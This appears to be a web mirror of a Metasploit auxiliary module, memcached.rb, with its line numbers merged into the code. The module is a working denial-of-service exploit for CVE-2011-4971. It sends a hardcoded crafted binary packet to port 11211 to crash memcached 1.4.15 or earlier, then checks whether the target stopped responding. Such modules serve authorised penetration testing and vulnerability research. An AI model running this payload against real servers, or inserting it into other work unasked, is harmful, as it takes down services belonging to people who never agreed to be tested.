Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/auxiliary/dos/misc/memcached.rb
Views: 11783
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::Tcp7include Msf::Auxiliary::Dos89def initialize(info = {})10super(update_info(info,11'Name' => 'Memcached Remote Denial of Service',12'Description' => %q{13This module sends a specially-crafted packet to cause a14segmentation fault in memcached v1.4.15 or earlier versions.15},16'References' =>17[18[ 'URL', 'https://code.google.com/archive/p/memcached/issues/192' ],19[ 'CVE', '2011-4971' ],20[ 'OSVDB', '92867' ]21],22'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],23'License' => MSF_LICENSE24))2526register_options([Opt::RPORT(11211),])27end2829def is_alive?30begin31connect32disconnect33rescue Rex::ConnectionRefused34return false35end3637return true38end3940def run41connect42pkt = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00"43pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00"44pkt << "\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"45pkt << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"4647print_status("#{rhost}:#{rport} - Sending dos packet...")48sock.put(pkt)49disconnect5051print_status("#{rhost}:#{rport} - Checking host status...")52select(nil, nil, nil, 1)5354if is_alive?55print_error("#{rhost}:#{rport} - The DoS attempt did not work, host is still alive")56else57print_good("#{rhost}:#{rport} - Tango down") # WWJS - What would th3j35t3r say?58end59end60end616263